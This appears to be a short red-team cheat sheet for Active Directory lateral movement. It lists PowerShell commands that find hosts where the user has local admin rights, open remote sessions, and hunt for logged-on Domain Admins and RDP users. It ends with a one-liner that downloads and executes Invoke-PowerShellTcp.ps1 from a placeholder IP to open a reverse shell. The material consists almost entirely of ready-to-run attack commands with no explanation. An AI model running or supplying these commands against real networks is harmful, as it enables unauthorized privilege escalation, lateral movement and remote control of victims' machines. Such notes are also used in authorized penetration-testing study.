Find-LocalAdminAccess -Verbose
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
Invoke-EnumerateLocalAdmin -Verbose
Enter-PSSession -Computername <computername>
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess
Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"
Invoke-UserHunter -Groupname "Domain Admins"
Invoke-UserHunter -CheckAccess
{% code overflow="wrap" %}
Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IP
{% endcode %}